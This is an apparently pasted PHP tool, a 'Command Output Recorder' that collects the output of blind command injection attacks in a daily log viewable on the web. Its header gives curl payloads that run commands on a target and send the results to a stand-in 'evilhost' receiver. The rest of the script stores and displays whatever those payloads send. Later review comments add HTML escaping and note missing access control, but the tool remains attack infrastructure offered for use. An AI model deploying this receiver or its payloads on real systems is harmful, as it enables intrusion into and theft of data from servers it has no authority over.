
Command Output Recorder (Blind RCE & SSRF)

zerobyte-id May 16th, 2018 265 Never
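  <?php
  /*
      BLIND COMMAND INJECTION - OUTPUT RECORDER WITH CURL (WEB BASED)
      Coded By ZeroByte.ID (Schopath)

      [+] Payload :
      # curl -s "http://evilhost/cmd-read.php?cmd=$(pwd)";
      # curl -s --data-urlencode "cmd=$(uname -a)" -X POST "http://evilhost/cmd-read.php"

      Request handling:
        - GET or POST carrying "cmd" : append the value to today's log file.
        - POST carrying "reset"      : truncate today's log file, then show it.
        - anything else              : show today's log file as HTML.

      Review notes on the receiver itself:
        - Every "cmd" value is untrusted input. It is stored as-is and must be
          HTML-escaped when rendered, otherwise any sender can plant markup or
          script that runs in the browser of whoever opens this page.
        - Nothing here authenticates the caller: anyone who can reach the URL
          can append to, read, or reset the log, and the reset form carries no
          CSRF token. Access control has to come from the web server.
        - The log name is md5(current date), so it is guessable, and the file is
          created next to the script, where the web server may serve it directly.
          Denying direct access to *.log (or using a directory outside the
          document root) keeps recorded output from being fetched by third parties.
  */

  // The original called error_log(0), which writes the literal message "0" to the
  // error log on every request. Presumably the intent was to turn logging off,
  // which is what the ini setting does.
  ini_set('log_errors', '0');
  error_reporting(0);

  // One log file per calendar day.
  $file = "cmdrec_".md5(date("Ymd")).".log";

  // Make sure the file exists so the viewer branch can always read it.
  if (!file_exists($file)) {
      file_put_contents($file, "");
  }

  // GET takes precedence over POST, as in the original branch order.
  $record = isset($_GET['cmd'])
      ? $_GET['cmd']
      : (isset($_POST['cmd']) ? $_POST['cmd'] : null);

  if ($record !== null) {
      // "cmd[]=..." arrives as an array; flatten it instead of logging "Array".
      if (!is_string($record)) {
          $record = print_r($record, true);
      }

      // 24-hour clock ("H"): the 12-hour "h" without am/pm made entries ambiguous.
      $entry = "--- Updated on ".date("Y-m-d H:i:s")." -----\n"
          . $record."\n"
          . "----------------------------------------\n";

      // Single locked append so concurrent requests cannot interleave entries.
      if (file_put_contents($file, $entry, FILE_APPEND | LOCK_EX) === false) {
          die("Failed open to open file!");
      }
  } else {
      // Handle the reset before rendering, so the page shown after clicking
      // "Reset Log" reflects the emptied file rather than the old content.
      if (isset($_POST['reset'])) {
          if (file_put_contents($file, "", LOCK_EX) === false) {
              die("Failed open to open file!");
          }
      }

      $log = file_get_contents($file);
      if ($log === false) {
          $log = "";
      }

      echo "<pre>\n";
      echo "<b><big>##### BLIND COMMAND INJECTION - OUTPUT RECORDER #####</big></b><br>\n";
      // Escape the stored data for the HTML context. ENT_SUBSTITUTE keeps
      // non-UTF-8 bytes from turning the whole output into an empty string.
      echo htmlspecialchars($log, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
      echo "</pre>\n";
      echo "<form method=\"post\"><input type=\"submit\" name=\"reset\" value=\"Reset Log\"></form>";
  }
  ?>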